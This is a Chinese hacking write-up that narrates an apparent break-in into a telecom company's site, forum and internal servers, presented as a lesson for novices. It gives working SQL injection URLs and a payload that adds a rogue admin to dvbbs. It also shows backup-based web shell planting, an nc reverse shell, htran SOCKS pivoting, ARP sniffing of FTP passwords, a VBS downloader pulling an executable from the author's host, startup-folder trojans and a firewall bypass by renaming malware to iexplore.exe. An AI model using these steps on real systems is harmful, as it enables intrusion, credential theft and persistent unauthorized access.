一、踩点:

http://xxx.online.xx.xx XX电信的站点，这个站是我一直都想拿下的，首页存在注入点，是sa
登陆，数据库是放另一外网的主机，那台主机禁止对外连接，但是可以上网，对外不开放端口。
http://xxx.online.xx.xx/bbs为其论谈，是access+dvbbs7.0 sp2.

二、拿下aspshell

动网前台提权的方法我就不多说了，jinsdb给的工具，很快就提完前台。不抓图，继续.
得到前台后就是对拿后台。动网recycle.asp过滤不严，导致注入漏洞的存在，先说一下,漏洞不是我发现的，构造注入点如下:

http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,l_content,4,5,6 from dv_log where l_id>0 union select 1,1,1,1,1,1 from dv_bbs1&page=7

这里要注意的是，这个漏洞的前提是以前台管理员身份登陆，对access和mssql的dvbbs7.x通杀，通过上面的构造，就可以暴出 l_content的内容这里还要说的是，最后面的&page=7，通过上面的注入语句是暴出所有l_content的值，但是动网一个界面只能显示10多条，所以大家通过修改page的值来找l_content的内容，一般是在最后几个数字，这个page是回收站的页数，如果一共有130页，你一般从120开始，这样，通过121，122，一直累注上去，直到找出password的明文，如果你懂点sql的话，当然也可以用来暴管理员的散列，只是变换一下注入语句而已，如:

http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,password,4,5,6 from dv_admin where password>0 union select 1,1,1,1,1,1 from dv_bbs1&page=7

利用上面的注射方式，可以暴出l_content的值，当然，如果你想暴dv_admin的话，只要构造一下注射语句就可以了。利用这种注册很快暴出
前后台的账号和密码。如图一:

而对于sql方法更多，动网的其它文件也存在注入漏洞，如:先查看一下随便一个用户的资料，在最下面的奖惩处点一下，如图二:

接着在操作理由里输入:

test ，没有对用户进行分值操作','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('linzi123','7412b5da7be0cf42','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','linzi123');--

这样在后台就加了一个linzi123的用户。进到后台后，sql的和access在备份的地方有些不同，偶给大家一个备份得shell的文件databack.htm.
打开他的源代码，找到语句

<form method="post" action="http://目标主机/ADMIN_data.asp?action=BackupData&act=Backup">

把目标主机换成你已经进入后台的url就可以了，如http://www.cnbct.org/bbs/,接下来就和access的一样了，方法我就不多说了。
当然你也可以利用backup a shell，在国内几个商业黑客站点里有文章介绍。但是要注意的是要看权限，public权限就别想的了，至少我是无法做到。

三、代理的妙用

思路:
 
得到aspshell后，从传统的思维模式从发，先拿下这台机子，然后再向内网渗透。但是通过踩点后发现，主机的安全性做的还可以，没什么可以利用的第三方补丁。提权，以自身的水平来说，还无法这现。通过踩点可以知道，目录限的很死，activeX禁创控件，虽然主机有用 Serv-U，但是改了端口和默认的账号和密码，所以根本无法提权。这时的想法是，先利用jetexp得到一个可执行的shell，然后，利用这个 shell把主机做成一个socks5肉鸡，通过反弹，本机也进入其内网，再接着，就是扫描嗅探出主机Serv-U的账号和密码，然后quote site exec执行命令.

实践过程:

1.本地执行:jet 1 222.222.222.222 520
其中222.222.222.222为本机的IP，520为听的端口.生成一个db1.mdb，
2.把它上传到xxx.online.xx.xx,利用老兵的数据库操作功能打开这个db1.mdb，当然用海阳2006的数据库操作功能也可以，
只要可以打开就可以.
3.本机事先用nc执行nc -vv -l -p 520，很快就得到一个反弹的shell，这里说一下，反弹的权限是当前权
限，当你用system admin打开db.mdb，返回的会是systemshell，而在aspshell下打开则返回了aspshell的权限。
4.得到shell后，再上传一个htran,新板的htran有个sock5反弹的功能。执行如下:
本机: htran -s -listen 670 6700
xxx.online.xx.xx的aspshell上执行:htran -s -connect 我的IP 670
5.本机再用sockcap连接我的IP的6700端口，自己就变成了在他的内网中，这里要说的是guest权限是可以实现socks5的转发，大家不必去担心权限
不够。 sockscap连接后，挂上扫描器，这个时候你扫的就会是那个内网所在的机子了，偶挂上后扫到内网几台弱口令的机子。

四、向主机进军

得到内网的机子的system权限后，开了他的TS，并用htran转到了公网(详情见我做的动画，光备里有)。有了一个GUI界面，
也就方便自己的渗透，开始驱动，准备arpsniffer，因为主机有ftp，且是serv-u,所以我选择了嗅探它的21端口。对于嗅探的内容，网上有很多人做成了动画，大家去国内的黑客站点搜索一下就有资料。但是有一点要说一下，有些朋友在嗅探时老是显示can'n spoof等等出错，我建议大家去小榕的官方去下载原板的，个人觉得是驱动问题，大家换旧的驱动，不要用新的，个人经验。
几天后，再登上内网的机子，查了一下嗅的文件，看到了漂亮的ftp密码，不过不是system权限，好在目录是c:\，有写的权限，向启动写了一个批处理志，内容就是运行偶上传的马儿，这里的马，偶放了一个没公布的马，免杀嘛！几天后就看到反弹了。反弹后，偶先把它做成了sockscap肉鸡,这个时候做成服务，方便以后进来。用sockscap加个服务器，主要是方面以后的渗透，做完后，用sockscap添加3389登陆器，然后连接127.0.0.1就看到了界面，如图五:

五、向最难的SQL进军

查看conn.asp文件后，可知mssql服务器的IP是另一公网主机，不过，这台主机很让人难过，因为那台主机做了IP限制，
只对xxx.online.xx.xx开放1433端口，其它的主机碰都碰不到它，另外采用软硬结合的防火墙，禁止程序对外连接，还好可以上网。
到这里对于渗透这台主机有两个思路:

1.端口复用，把3389端口复用在1433上，跑到群里问了一下lcx，他说htran可以复用，但是试过后发现不可以，再后来lcx说原来他在测试时，mssql没有打开，所以可以用，哈哈。不过，给他装个rookit,利用rookit或后门来实现复用。不过没去试，只是一个思路。

2.端口转发.
先把sql给停掉，这样1433端口就可以用了，再利用htran把TS映到1433，用 xxx.online.xx.xx 这台主机连接1433，就可以得到GUI界面。这里大家可以利用at命令写个批处理志，然后先停后转发。因为是sa权限，所以不用担心权限，先写一个 down.vbs，在nbsi里输入:

echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs

然后cscript http://linzi.cnbct.org/mt.exe mt.exe //下载一个免杀的mt.exe，再用mt -pslist找到mssql的进程。

再写个批处志，代码如下:

@echo off
mt -pskill ID
htran -p -tran 1433 127.0.0.1 3389

再用at命令执行批处志,当然还有其它好的方法，但我最后是利用第二个方法，拿下了最难搞的sql.
这里还有要说的，对于碰到程序防火墙，这个时候，你的反弹的马儿，一般都反不回来，这个时候我建议大家可以试着用插信任的进程，或者替换掉信任程序的方法来突破，如C:\Program Files\Internet Explorer\IEXPLORE.EXE里的iexplore.exe是被防火墙信任的，
这个时候你可以把你的木马传到C:\Program Files\Internet Explorer\文件夹里，并把他的名称改为iexplore.exe,这里主要是利用防火墙对
程序的判断只局限于路径和文件名的判断上，我在虚拟机里我测试通过，测试的防火墙是天网，其它的没试，大家有兴趣的话可以自己测试一下.

六、总结

这里的总结是对新手说的，也是我个人学习的经验。当你看一篇文章时，不要一晃而过，对于经典的文章有它要取之处，多做笔记，多去了解一下它在哪个地方值得学习，或者是很好的，记下来，不断的总结与学习，知识沉淀到一定程度，当它暴发，会很美很精彩。

对于这篇文章，技术水平不是很高，但如果你从中学到了东西，那么这篇文章也就尽了它的作用。

如果还有不太明白的可以到非安全或者BCT来找我，我会尽量帮大家。